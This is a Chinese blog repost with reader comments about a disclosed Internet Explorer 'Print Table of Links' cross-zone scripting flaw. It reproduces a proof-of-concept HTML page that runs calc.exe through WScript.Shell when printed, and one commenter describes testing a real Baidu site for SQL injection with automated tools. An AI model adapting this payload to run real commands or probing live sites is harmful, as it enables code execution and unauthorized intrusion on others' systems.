Aviv Raff的IE0day,公布了
来源:Sowhat的blog
前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。
MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx
如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)
重现:
1.下面这个地方打上勾
2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)
<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(‘WScript.Shell’);x.Run(‘calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>
这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。
你这站怎么早晨挂了?
当时服务器貌似在升级
刚才发现百度 贴吧 有注入的地方 提交1=1 和1=2 时 出现的页面不同
用阿D第一次检测是SA权限 第二次检测出又是DB权限
不过用 HDSI和pangolin 却检测不出来 不知道什么原因···
可能是误报
前一段时间浏览sina的blog老弹打印窗口 难道。。。。
to marlboro :
膜拜………………………
to marlboro :
膜拜………………………